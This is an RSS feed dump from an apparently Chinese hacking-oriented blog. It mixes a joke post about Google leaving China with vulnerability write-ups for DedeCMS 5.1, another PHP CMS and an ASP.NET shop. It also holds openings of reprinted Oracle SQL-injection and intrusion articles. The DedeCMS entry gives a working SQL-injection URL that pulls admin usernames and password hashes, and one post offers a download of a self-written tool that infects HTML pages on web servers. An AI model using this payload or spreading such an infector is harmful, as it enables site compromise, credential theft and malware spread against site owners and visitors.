<![CDATA[蜀山剑客's Blog Http://Www.SSJK.Org]]>

<![CDATA[蜀山剑客's Blog Http://Www.SSJK.Org]]> http://www.ssjk.org/ en LBS v2.0.313 Fri, 10 Sep 2010 12:18:49 +0800 60 <![CDATA[google]]> ]]> Wed, 24 Mar 2010 22:22:10 +0800 http://www.211314.com

世界用Google，我们用百度；世界用youtube，我们用优酷；世界用牛奶，我们用三鹿；世界用游戏机，我们用劲舞；世界用facebook，我们用

开心；世界用MSN，我们用QQ；世界用 WCDMA，我们用TD；世界用FTTH，我们用adsl；世界用internet，我们用LAN

网易、腾讯、百度、谷歌等几个趴在一起吃屎。某天，一直捂着鼻子吃的谷歌终于爆发：臭死了，老子不吃了。网易的眉头皱了一下，腾讯好

像听到了，好像没听到。百度听到了，偷偷朝谷歌那边挪了一下，把谷歌那份屎扒到自己面前继续吃。”

据悉，在Google准备退出中国之后，空气、水分、太阳、月亮也准备退出。中国强烈抗议自然界的2B行为，呼吁中华民族抵制自然界。

什么？！Facebook没了？！。。。什么？！YouTube没了？！。。。什么？！Google没了？！。。。什么？！我也没了？！。。。
]]> <![CDATA[dedecms 5.1 gbk 版 0DAY]]> ]]> Thu, 27 Nov 2008 21:02:11 +0800
暂不公布信息!
先公布修补漏洞方法: 关闭会员功能

这漏洞现在公布了吧!刚朋友说有个网站上公布漏洞了,不过没有公布漏洞利用方法!

漏洞描述:编码注射
漏洞文件:company/search.php
影响程序:高
漏洞成因:$comname过滤不完全
测试方法:(注:请勿作着非法用途,否则后果自负)
注册会员,注册时选择公司, 公司名字只要包括 "诚"字即可, 如诚有限公司 ,
注册成功后访问http://url/company/search.php?comname=%d5' and 1=2 union select 1,userid,3,4,5,pwd,7,8,9,10,11 from dede_admin%23/*]]> <![CDATA[DedeCmsV5.1FreeSP1正式版跨站漏洞]]> ]]> Thu, 27 Nov 2008 16:39:48 +0800 据我测试 dedecms 5.1 gbk版同样存在这个漏洞,估计UTF8也一样!

http://www.ssjk.org/uploads/200811/27_164723_1.jpg.jpg

]]> <![CDATA[两PHP程序漏洞]]> ]]> Tue, 25 Nov 2008 18:27:22 +0800

http://www.ssjk.org/uploads/200811/25_183055_11.jpg

二: 某CMS系统

漏洞描述：本地包含
漏洞文件:adminm/adminm.php
影响程度：中
漏洞成因：未过滤$action
漏洞代码:include_once M_ROOT.'./adminm/'.$action.'.inc.php';
测试方法：注册会员，提交adminm/adminm.php?action=xxxxx
鸡肋漏洞.呵呵]]> <![CDATA[写了个感染网页的小东西---五.一快乐]]> ]]> Thu, 01 May 2008 06:11:18 +0800 怕被乱用,只感染HTML文件.其它网页文件不感染!

Explain: filename.exe d: www.xx.com/mm.htm
filename.exe d:\\wwwroot www.xx.com/mm.htm

Click Here To Download]]> <![CDATA[最近看一个商城购物的程序,做的还不错!不过安全确实很有问题!]]> ]]> Mon, 07 Jan 2008 18:08:28 +0800
漏洞描述:
开发语言:asp.net

程序名字:易想商城3.0（这是最新的，其它版本就不用看了）

漏洞产生:
在Productlist_1.aspx这个。确切说是在Productlist_1.aspx.cs
第44行开始！
if (HttpContext.Current.Request["SearchText"] != null)
{
SearchText = HttpContext.Current.Request["SearchText"].ToString();
]]> <![CDATA[ART OF WEB-SQL-INJECTION第2卷 ORACLE篇]]> ]]> Wed, 29 Aug 2007 11:34:38 +0800 信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

注意：本文章首发I.S.T.O技术团队，后由原创作者友情提交到邪恶八进制信息安全团队论坛。
author : kj021320
team: I.S.T.O
很多人都说什么ASP PHP JSP注射其实注射最直接是跟数据库有关！然而那些脚本只是一种辅助
例如ASP/ASPX JSP 啥限制都没！而PHP则会把' 过滤为\' 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了！
但是我觉得这些脚本语言都不狠~如果CFM的话估计你就没折了！具体各数据库相关信息请参看
ART OF WEB-SQL-INJECTION第1卷感谢AMXSA以及I.C.E多我的支持

OK言归正传,在国外对ORACLE的攻击一直很收关注,只是国内研究的人不太多,或者技术不够~这里我就打响第一炮吧！
SQLINJECTION ]]> <![CDATA[入侵oracle数据库的一些心得]]> ]]> Wed, 29 Aug 2007 11:27:45 +0800 信息来源：邪恶八进制信息安全团队（www.eviloctal.com）
一、先看下面的一个贴子:

Oracle数据库是现在很流行的数据库系统，很多大型网站都采用Oracle，它之所以倍受用户喜爱是因为它有以下突出的特点：

1、支持大数据库、多用户的高性能的事务处理。Oracle支持最大数据库，其大小可到几百千兆，可充分利用硬件设备。支持大量用户同时在同一数据上执行各种数据应用，并使数据争用最小，保证数据一致性。系统维护具有高的性能，Oracle每天可连续24小时工作，正常的系统操作(后备或个别计算机系统故障)不会中断数据库的使用。可控制数据库数据的可用性，可在数据库级或在子数据库级上控制。

2、Oracle遵守数据存取语言、操作系统、用户接口和网络通信协议的工业标准。所以它是一个开放系统，保护了用]]>